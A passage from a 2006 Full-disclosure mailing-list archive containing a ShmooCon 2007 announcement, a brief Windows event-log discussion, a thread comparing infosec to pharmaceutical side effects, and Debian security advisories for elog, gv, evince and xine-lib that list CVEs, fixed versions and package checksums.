>full-disclosure at lists.grok.org.uk:
>
>>>There  is  interesting  thing  with  event  logging on Windows. The only
>>>security  aspect  of  it  is  event log record tampering and performance
>>>degradation,  but  it may become sensitive is some 3rd party software is
>>>used for automated event log analysis.
>
>MC> I doubt this. The event logs don't contain the actual formatted
>MC> string, because the template string is localized and only retrieved
>MC> when the entry is displayed - what is logged is just a message id
>MC> and the string inserts (see documentation for EVENTLOGRECORD).
>MC> FormatMessage (which is used to build the full message to display to
>MC> the user) isn't the culprit, either, because it doesn't operate
>MC> recursively (that would have bizarre consequences, since
>
>As  I  wrote,  my message is semi-offtopic, because it's more fun than
>any  security  vulnerability  here.
>
>Yes,  probably  this  bug  only  affects  event  viewer  itself. I don't
>understand  how  and why Microsoft achieved this effect in event viewer,
>which  is,  by  the  way,  security tool, and if it's hard for different
>vendor  to  make  same  mistake. It doesn't look like Easter egg, but if
>FormatMessage  does  not recursion it needs to be specially coded and it
>does  nothing  except this bug. Bug, that needs to be specially coded is
>new funny bug category, isn't it?
>
>--
>~/ZARAZA
>http://www.security.nnov.ru/
>
>

_________________________________________________________________
The MSN Entertainment Guide to Golden Globes is here.  Get all the scoop. 
http://tv.msn.com/tv/globes2007/



From gdead at shmoo.com  Wed Dec 27 20:37:34 2006
From: gdead at shmoo.com (B Potter)
Date: Wed, 27 Dec 2006 15:37:34 -0500
Subject: [Full-disclosure] ShmooCon Announcements
Message-ID: 

Howdy,
We're less than 3 months from the third ShmooCon.  First off, the  
important details:

When: March 23-25, 2007
Where: Washington DC
Who: about 1000 hackers, security pro's, and assorted others
What: 3 days of talks (4 tracks this year: Friday is a series of  
short talks for all attendees, Saturday and Sunday have three tracks  
similar to the last two years), contests, and parties
Who benefits: You, the attendee.  Also, we run ShmooCon on a cost  
recovery basis, so we only charge what we need to make the con happen  
for you... the leftover goes to seed next year's con and donations to  
various organizations.
More info:  www.shmoocon.org

There's a lot going on this year, so here are some of the highlights  
of the latest news:
==============
== Ticket Sales
==============
Tickets sales are being run differently than last year.  There are  
three sale cycles with _each cycle_ having $75, $150, and $300  
tickets for sale.  The first round of tickets went on sale Dec 1.   
The cheap tickets were sold out in about 15 hours.  The medium price  
tickets lasted a couple of days.  The next round of tickets go on  
sale Jan 1 and the final round go on sale Feb 1.  Check out the site  
for more info, and warm up your "refresh" button.

==============
== CFP
==============
The CFP is still open (at least for a few more weeks... Jan 15 is the  
last day CFP submissions will be accepted).  We've had a large number  
of submissions already, and have accepted a few talks.  We'll be  
doing the final round of acceptances in mid-January, so if you've got  
an idea rattling around in your head, better get it on paper and send  
it in.  More info at http://www.shmoocon.org/cfp.html

==============
== ShmooCon Labs
==============
Every year at Shmoocon we put a ton of work into the design and setup  
of our conference network. This year our NOC team is opening up this  
project as a pre conference event. As a participant you will get  
hands on time implementing cutting edge security tools in a real  
world environment. As a vendor you will get a chance to implement  
your gear in an untrusted, potentially hostile environment of 1000+  
hackers.

This is not your normal vendor dog and pony show. We are building a  
network that needs to be up and running in time for the conference so  
be prepared to jump in the fire. During Shmoocon various aspects of  
the network will be made available for attendees to hack on and all  
vendors should expect their products to get looked over with a fine  
tooth comb or a 20 pound hammer.

Shmoocon labs will run for the day and half prior to the start of  
Shmoocon. Shmoocon starts in earnest on the afternoon of March 23rd.  
The labs will start at the crack of dawn on the 22nd and have 36  
hours to get the network up and running.

Registration for the labs is open to conference attendees but we are  
limiting attendance to 30 people. Also, note that there will be a $50  
charge to help us cover costs. There are no hard and steadfast  
prerequisites, however we expect this event to be best suited towards  
people with background as Network Engineers, System Adminisrators and  
Security Engineers. We are looking for individuals who either are  
experts in one of the areas outlined above or people that are  
interested in learning more through hands on design, configuration,  
and deploying of these technologies.

This is not a "first come, first served" event... rather we are  
trying to find the right mix of individuals to make the network  
usable and help as many people learn from this process as possible.  
There is an application process for attending. If you are interested  
in attending, please send the following information to  
shmooconlabs at shmoocon.org:

- Summary of work/academic experience
- Why you are interested in attending the labs
- If you feel you are able to serve as a lead in one of the  
technology areas
- If you are able to show up a day early to help stage the lab
In order to cover our costs of running the lab, there will be a $50  
fee for each attendee. This basically will pay for space, food, and  
incidentals (zipties, cables, etc). On Feb 15th, we will finalize the  
attendee list for the labs. If you have any question please email  
shmooconlabs at shmoocon.org.

==============
== Hacker Arcade
==============
We will be doing the Hacker Arcade again this year.  Think of it as  
Chuck-e-Cheese, but instead of paper tickets, you get cryptographic  
tokens on a USB dongle that can be redeemed for prizes.  Hacker  
Arcade is a double-contest (if you will).  First, the games available  
in the arcade are made by con attendees.  The best games gets  
prizes... and even some of the more interesting games get prizes as  
well.  The winner last year was a Slash 'em game that utilized a home  
grown coin slot that somehow made it through airport security even  
tho it looked like a bomb.  There was also a great double sided skill  
crane that allowed both over the network and in person play.

Last year we had about 10 entries total.  We're hoping for more.  If  
you're interested in bringing a game, or have questions about the  
contest, check out http://www.shmoocon.org/arcade.html  or contact  
arcade at shmoocon.org

The other contest is the players of the arcade.  Just like Chuck-e- 
Cheese, the more you play, the more you can win.  So we will have  
prizes that you can redeem your tokens for... but some of the prizes  
will have limited quantity, so if you want one of the nicer ones, you  
better play soon and play often.

Like last year, all the proceeds from the lab will go to the EFF.

==============
== Hack-or-Halo
==============

Do you have anti-social tendencies? Do you ever think "man, this  
would be a great con, if only there weren't all these feds around,  
and I could just start pwning stuff." Or maybe you've found your self  
at a conference thinking "gee, I sure would like to shoot that guy in  
the face." In the past you may have had to suppress these urges. But  
not at ShmooCon! We understand your needs to compete, demonstrate  
skills, and enjoy gratuitous violence. So, once again, we bring you  
Hack-or-Halo!

Hack-or-Halo is the premier East coast hacking-plus-gaming event.  
Bring your skills in Halo 2, or your ability to break into boxen  
faster than your competitors, and you can win impressive prizes along  
with bragging rights. Hack-or-Halo is two tournaments in one. You've  
got your pick of high-speed drag race hacking, or quick rounds of  
free-for-all slayer Halo 2.

==============
== Fin
==============

That's it.  If you have questions about attending, sponsorship, or  
just random praise, please email info at shmoocon.org

See you all in DC!

later

bruce








From jmm at debian.org  Wed Dec 27 22:33:30 2006
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Wed, 27 Dec 2006 23:33:30 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1242-1] New elog packages fix
	arbitrary code execution
Message-ID: <20061227223330.GA15059@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1242-1                    security at debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
December 27th, 2006                     http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : elog
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID         : CVE-2006-5063 CVE-2006-5790 CVE-2006-5791 CVE-2006-6318

Several remote vulnerabilities have been discovered in elog, a web-based
electronic logbook, which may lead to the execution of arbitrary code.
The Common Vulnerabilities and Exposures project identifies the following
problems:

CVE-2006-5063

    Tilman Koschnick discovered that log entry editing in HTML is vulnerable
    to cross-site scripting. This update disables the vulnerable code.

CVE-2006-5790

    Ulf Harnhammar of the Debian Security Audit Project discovered several
    format string vulnerabilities in elog, which may lead to execution of
    arbitrary code.

CVE-2006-5791

    Ulf Harnhammar of the Debian Security Audit Project discovered 
    cross-site scripting vulnerabilities in the creation of new logbook
    entries.

CVE-2006-6318

    Jayesh KS and Arun Kethipelly of OS2A discovered that elog performs
    insufficient error handling in config file parsing, which may lead to
    denial of service through a NULL pointer dereference.

For the stable distribution (sarge) these problems have been fixed in
version 2.5.7+r1558-4+sarge3.

The upcoming stable distribution (etch) will no longer include elog.

For the unstable distribution (sid) these problems have been fixed in
version 2.6.2+r1754-1.

We recommend that you upgrade your elog package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/e/elog/elog_2.5.7+r1558-4+sarge3.dsc
      Size/MD5 checksum:      581 c072e867caa0058ac44cbd69c6afff51
    http://security.debian.org/pool/updates/main/e/elog/elog_2.5.7+r1558-4+sarge3.diff.gz
      Size/MD5 checksum:    23758 0718302e60a98844f27cd6eab336c5ce
    http://security.debian.org/pool/updates/main/e/elog/elog_2.5.7+r1558.orig.tar.gz
      Size/MD5 checksum:   538216 e05c9fdaa02692ce20c70a5fd2748fe3

  Alpha architecture:

    http://security.debian.org/pool/updates/main/e/elog/elog_2.5.7+r1558-4+sarge3_alpha.deb
      Size/MD5 checksum:   556190 081bd3b98bea9516c26b487024d6140f

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/e/elog/elog_2.5.7+r1558-4+sarge3_amd64.deb
      Size/MD5 checksum:   512510 48ee1c675cefa6a0b0af01f7cbb9f079

  ARM architecture:

    http://security.debian.org/pool/updates/main/e/elog/elog_2.5.7+r1558-4+sarge3_arm.deb
      Size/MD5 checksum:   517072 5e4a4dc726a8a0bf75f05de3fe17e07c

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/e/elog/elog_2.5.7+r1558-4+sarge3_hppa.deb
      Size/MD5 checksum:   544448 5f5c83341837c6dd18211b4164bbd1dc

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/e/elog/elog_2.5.7+r1558-4+sarge3_i386.deb
      Size/MD5 checksum:   514786 c14108b91d171ac38b0104ae769cfc96

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/e/elog/elog_2.5.7+r1558-4+sarge3_ia64.deb
      Size/MD5 checksum:   598224 df22b05edfb9dfab43cc69233f2d88e4

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/e/elog/elog_2.5.7+r1558-4+sarge3_m68k.deb
      Size/MD5 checksum:   482826 254d8a1f1cae62719a9f6f2a461cffd8

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/e/elog/elog_2.5.7+r1558-4+sarge3_mips.deb
      Size/MD5 checksum:   522074 909b22df0ac8302bd7b00b8338511198

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/e/elog/elog_2.5.7+r1558-4+sarge3_mipsel.deb
      Size/MD5 checksum:   525164 278bc7397817c8f6a8a44d2879f0682c

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/e/elog/elog_2.5.7+r1558-4+sarge3_powerpc.deb
      Size/MD5 checksum:   524304 37438b8fff9c0b162aa6870fd5c7ba31

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/e/elog/elog_2.5.7+r1558-4+sarge3_s390.deb
      Size/MD5 checksum:   515148 32cf397b104321646de736141a90354d

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/e/elog/elog_2.5.7+r1558-4+sarge3_sparc.deb
      Size/MD5 checksum:   519788 b532c963d03d66f4e32861531adefe4e


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFFkvSHXm3vHE4uyloRAk+DAJ49IGlpV6HUrg2/EWlIRrFONVx80gCgu22h
5xHJ1Ia+bLJKBAUBWvd019Y=
=8iOu
-----END PGP SIGNATURE-----



From jmm at debian.org  Wed Dec 27 22:38:22 2006
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Wed, 27 Dec 2006 23:38:22 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1214-2] Updated gv packages fix
	arbitrary code execution
Message-ID: <20061227223822.GA15186@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1214-2                    security at debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
December 27th, 2006                     http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : gv
Vulnerability  : buffer overflow
Problem-Type   : local(remote)
Debian-specific: no
CVE ID         : CVE-2006-5864
Debian Bug     : 398292

The original update provided in DSA 1214-1 was insufficient; this update
corrects this. For reference the original advisory below:

Renaud Lifchitz discovered that gv, the PostScript and PDF viewer for X,
performs insufficient boundary checks in the Postscript parsing code,
which allows the execution of arbitrary code through a buffer overflow.

For the stable distribution (sarge) this problem has been fixed in
version 3.6.1-10sarge2.

For the upcoming stable distribution (etch) this problem has been
fixed in version 3.6.2-2.

For the unstable distribution (sid) this problem has been fixed in
version 3.6.2-2.

We recommend that you upgrade your gv package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/g/gv/gv_3.6.1-10sarge2.dsc
      Size/MD5 checksum:      562 2870520620770dc432dbdaa1e7e142d0
    http://security.debian.org/pool/updates/main/g/gv/gv_3.6.1-10sarge2.diff.gz
      Size/MD5 checksum:    30712 3722a960c3256870ca1fa1ccfd9233d0
    http://security.debian.org/pool/updates/main/g/gv/gv_3.6.1.orig.tar.gz
      Size/MD5 checksum:   453921 ace080d647b70f46fca7946e9543b79e

  Alpha architecture:

    http://security.debian.org/pool/updates/main/g/gv/gv_3.6.1-10sarge2_alpha.deb
      Size/MD5 checksum:   205114 77a27845f5f5f01e8990ec9d21462c22

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/g/gv/gv_3.6.1-10sarge2_amd64.deb
      Size/MD5 checksum:   178158 a090a76c844cd4f3c436bd79574b2537

  ARM architecture:

    http://security.debian.org/pool/updates/main/g/gv/gv_3.6.1-10sarge2_arm.deb
      Size/MD5 checksum:   171792 0ac3bebc912bc97b650e642e5b7a6fb2

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/g/gv/gv_3.6.1-10sarge2_hppa.deb
      Size/MD5 checksum:   183804 97647fb85e922d0613a0192d26c11a2b

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/g/gv/gv_3.6.1-10sarge2_i386.deb
      Size/MD5 checksum:   169170 7b69ed8385a605b87b1bf2f9dc687fbc

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/g/gv/gv_3.6.1-10sarge2_ia64.deb
      Size/MD5 checksum:   236484 bfb71248f803f4872d72564513014962

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/g/gv/gv_3.6.1-10sarge2_m68k.deb
      Size/MD5 checksum:   152820 9ff5dd66d496e50bd469478cd6839588

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/g/gv/gv_3.6.1-10sarge2_mips.deb
      Size/MD5 checksum:   188510 9395b0df411569697520139b63bc6bf5

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/g/gv/gv_3.6.1-10sarge2_mipsel.deb
      Size/MD5 checksum:   187894 b0fd7324e56afa992d3fc780bceb0762

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/g/gv/gv_3.6.1-10sarge2_powerpc.deb
      Size/MD5 checksum:   178972 3a69e3cba502d0c5f3a437d63eef1111

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/g/gv/gv_3.6.1-10sarge2_s390.deb
      Size/MD5 checksum:   176486 cbb51ea7484e8ffb8c4de6a577280734

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/g/gv/gv_3.6.1-10sarge2_sparc.deb
      Size/MD5 checksum:   166592 d76b0edee71f6ca50b0083c1889760ed

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFFkvWjXm3vHE4uyloRAvsqAKCpgMrCIV+Ljv2mLOrCyhsfpPwNcACfdCqB
dB/c01FyIkvE5adyckWiuWk=
=HLhv
-----END PGP SIGNATURE-----



From jmm at debian.org  Thu Dec 28 00:19:11 2006
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Thu, 28 Dec 2006 01:19:11 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1243-1] New evince packages fix
	arbitrary code execution
Message-ID: <20061228001911.GA19398@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1243-1                    security at debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
December 28th, 2006                     http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : evince
Vulnerability  : buffer overflow
Problem-Type   : local(remote)
Debian-specific: no
CVE ID         : CVE-2006-5864

Renaud Lifchitz discovered that gv, the PostScript and PDF viewer for X,
performs insufficient boundary checks in the Postscript parsing code,
which allows the execution of arbitrary code through a buffer overflow.
Evince embeds a copy of gv and needs an update as well.

For the stable distribution (sarge) this problem has been fixed in
version 0.1.5-2sarge1.

For the upcoming stable distribution (etch) this problem has been
fixed in version 0.4.0-3.

For the unstable distribution (sid) this problem has been fixed in
version 0.4.0-3.

We recommend that you upgrade your evince package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/e/evince/evince_0.1.5-2sarge1.dsc
      Size/MD5 checksum:     1627 82308e07e1d4ff19d5c20bfa08a2ca4d
    http://security.debian.org/pool/updates/main/e/evince/evince_0.1.5-2sarge1.diff.gz
      Size/MD5 checksum:    35845 31a28bde68dcb7d3e251f9dc1b9f88ab
    http://security.debian.org/pool/updates/main/e/evince/evince_0.1.5.orig.tar.gz
      Size/MD5 checksum:  1005696 cc698ae555493976c43275894e235aa3

  Alpha architecture:

    http://security.debian.org/pool/updates/main/e/evince/evince_0.1.5-2sarge1_alpha.deb
      Size/MD5 checksum:   615800 e9d03d4c920192617d3648626f6278cf

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/e/evince/evince_0.1.5-2sarge1_amd64.deb
      Size/MD5 checksum:   539460 023f8defb0d66307fadd02d4e28e74bc

  ARM architecture:

    http://security.debian.org/pool/updates/main/e/evince/evince_0.1.5-2sarge1_arm.deb
      Size/MD5 checksum:   542130 fa1d8a7dae315c096d2ab50a072df5a1

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/e/evince/evince_0.1.5-2sarge1_hppa.deb
      Size/MD5 checksum:   641274 933d0b4eb4674cd0b9371eb45b9db683

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/e/evince/evince_0.1.5-2sarge1_i386.deb
      Size/MD5 checksum:   547712 701bf1d4c90d3df689b473c5ee49a2c6

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/e/evince/evince_0.1.5-2sarge1_ia64.deb
      Size/MD5 checksum:   698850 6e716fc726f6697ef00cd159bb62797e

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/e/evince/evince_0.1.5-2sarge1_m68k.deb
      Size/MD5 checksum:   513772 d935177d44a9966c6d9a70b5789c8c99

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/e/evince/evince_0.1.5-2sarge1_mips.deb
      Size/MD5 checksum:   561008 25acbd50276a480fd90e21ab4a0ef1e1

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/e/evince/evince_0.1.5-2sarge1_mipsel.deb
      Size/MD5 checksum:   555142 53a745c52d5832a10b482e64c230ad14

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/e/evince/evince_0.1.5-2sarge1_powerpc.deb
      Size/MD5 checksum:   551168 2d1a37729b9ccec24c8549c583672fc3

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/e/evince/evince_0.1.5-2sarge1_s390.deb
      Size/MD5 checksum:   544150 db01c57b798b13ff73fed60b6c2f192c

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/e/evince/evince_0.1.5-2sarge1_sparc.deb
      Size/MD5 checksum:   521424 176053a2c120ee66cf5f449ee7eb3d07

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFFkwzrXm3vHE4uyloRAptOAJ4v2j2F2fmd6/KO5+t6DhTYK3Xh0ACfbb9S
zP9qDW6nYYTk3khlBUspb/o=
=3BYe
-----END PGP SIGNATURE-----



From imipak at gmail.com  Wed Dec 27 19:50:31 2006
From: imipak at gmail.com (imipak)
Date: Wed, 27 Dec 2006 19:50:31 +0000
Subject: [Full-disclosure] [WEB SECURITY] Re: comparing information
	security to other industries
Message-ID: 

Krainium wrote:

> How long would a pharmaceutical company
> exist if it's drugs were known to be poisonous?  Would the patient buy and
> take the antidote so they could continue using the drug, much like we now buy
> and use all kinds of antivirus, anti-trojan, anti-spyware, etc?


Adverse drug reactions (aka "side effects") are roughly speaking the
fourth leading cause of death in the USA (and presumably similar rates
prevail in other developed economies.)


Lazarou J, Pomeranz B, Corey PN. Incidence of adverse drug reactions
in hospitalized patients: A meta-analysis of prospective studies. JAMA
1998;279:1200?1205.


cheers

/i

-- 
And what exactly is a dream?
And what exactly is a joke?
                                            - Syd Barrett



From mikie.simpson at gmail.com  Thu Dec 28 11:23:26 2006
From: mikie.simpson at gmail.com (Michael Simpson)
Date: Thu, 28 Dec 2006 11:23:26 +0000
Subject: [Full-disclosure] [WEB SECURITY] Re: comparing information
	security to other industries
In-Reply-To: 
References: 
Message-ID: <82abd3a70612280323l4bc83cd8n779b20229dc8cebc@mail.gmail.com>

On 12/27/06, imipak  wrote:
> Krainium wrote:
>
> > How long would a pharmaceutical company
> > exist if it's drugs were known to be poisonous?  Would the patient buy and
> > take the antidote so they could continue using the drug, much like we now buy
> > and use all kinds of antivirus, anti-trojan, anti-spyware, etc?
>
>
> Adverse drug reactions (aka "side effects") are roughly speaking the
> fourth leading cause of death in the USA (and presumably similar rates
> prevail in other developed economies.)
>
>
> Lazarou J, Pomeranz B, Corey PN. Incidence of adverse drug reactions
> in hospitalized patients: A meta-analysis of prospective studies. JAMA
> 1998;279:1200?1205.
>
>
> cheers
>
> /i
>
> --
> And what exactly is a dream?
> And what exactly is a joke?
>                                            - Syd Barrett
>


seems appropriate to introduce concepts from the work of ivan illich
at this point

http://www.infed.org/thinkers/et-illic.htm

http://jech.bmj.com/cgi/content/full/57/12/919)

"medical nemesis" should be required reading for any medic and his
theories in general should be studied by individuals belonging to any
emerging profession



From jmm at debian.org  Thu Dec 28 17:39:00 2006
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Thu, 28 Dec 2006 18:39:00 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1244-1] New xine-lib packages fix
	arbitrary code execution
Message-ID: <20061228173900.GA3805@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1244-1                    security at debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
December 28th, 2006                     http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : xine-lib
Vulnerability  : buffer overflow
Problem-Type   : local(remote)
Debian-specific: no
CVE ID         : CVE-2006-6172
Debian Bug     : 401740

It was discovered that the Xine multimedia library performs insufficient
sanitising of Real streams, which might lead to the execution of arbitrary
code through a buffer overflow.

For the stable distribution (sarge) this problem has been fixed in
version 1.0.1-1sarge5.

For the upcoming stable distribution (etch) this problem has been
fixed in version 1.1.2+dfsg-2.

For the unstable distribution (sid) this problem has been fixed in
version 1.1.2+dfsg-2.

We recommend that you upgrade your xine-lib packages.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/x/xine-lib/xine-lib_1.0.1-1sarge5.dsc
      Size/MD5 checksum:     1059 cd19dea4bbccc12c789884056d1468fb
    http://security.debian.org/pool/updates/main/x/xine-lib/xine-lib_1.0.1-1sarge5.diff.gz
      Size/MD5 checksum:     4435 b8459683695418e142fd4df413417fae
    http://security.debian.org/pool/updates/main/x/xine-lib/xine-lib_1.0.1.orig.tar.gz
      Size/MD5 checksum:  7774954 9be804b337c6c3a2e202c5a7237cb0f8

  Alpha architecture:

    http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge5_alpha.deb
      Size/MD5 checksum:   107742 b2a85d200303ed3505157a2d08d5ae08
    http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge5_alpha.deb
      Size/MD5 checksum:  4829772 bdc33d1faede7e6494b359c218edda6b

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge5_amd64.deb
      Size/MD5 checksum:   107738 876778a08d5316038e8df0d209a28662
    http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge5_amd64.deb
      Size/MD5 checksum:  3933538 422c74102dff610b3852d99a055d06ff

  ARM architecture:

    http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge5_arm.deb
      Size/MD5 checksum:   107784 0c04a5513f177d86582852ce29c3bad0
    http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge5_arm.deb
      Size/MD5 checksum:  3878498 f45053d66f38f7304cb7a5f131d30ee6

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge5_hppa.deb
      Size/MD5 checksum:   107758 9e9e197f924a655f3143a4b873a7c61f
    http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge5_hppa.deb
      Size/MD5 checksum:  3600800 f26c5eaebd2d2454e3a2f2d1b88a2897

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge5_i386.deb
      Size/MD5 checksum:   107734 84dd3db6ac72153194a994265a35f1b8
    http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge5_i386.deb
      Size/MD5 checksum:  4206006 ca2a6b6c5a6b3fcac6959e79094bc05e

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge5_ia64.deb
      Size/MD5 checksum:   107734 d5a843404804dd120f4d867abc97c152
    http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge5_ia64.deb
      Size/MD5 checksum:  5620720 75ab1916494e948fd578993e995c8242

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge5_m68k.deb
      Size/MD5 checksum:   107816 6516980ebb2f7921a6091568f8063725
    http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge5_m68k.deb
      Size/MD5 checksum:  3175358 983be20c652e0fe3e657e072641d4f2a

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge5_mips.deb
      Size/MD5 checksum:   107772 d8ad5153cbf4d684782dd0eae73acfa4
    http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge5_mips.deb
      Size/MD5 checksum:  4066822 d08d8b577231e7f8ef831787b10599f2

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge5_mipsel.deb
      Size/MD5 checksum:   107760 f60c90058fa3dfa43d1ee20568732575
    http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge5_mipsel.deb
      Size/MD5 checksum:  4125586 fd6b6ccf2d7cd70c4c149da5a581fd1e

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge5_powerpc.deb
      Size/MD5 checksum:   107758 d98ab6a9998b4a1fb9f2f847f7ac498d
    http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge5_powerpc.deb
      Size/MD5 checksum:  4305668 82eacf4f32a4a9c9d6784f8dafe7f5eb

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge5_s390.deb
      Size/MD5 checksum:   107732 3c271479f40a0e87f5833031c7216707
    http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge5_s390.deb
      Size/MD5 checksum:  3880792 47feaca578c6b5b6551256cd5dca98b0

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge5_sparc.deb
      Size/MD5 checksum:   107756 863e2e6bbdf43a5ce0af40ba3a99fa46
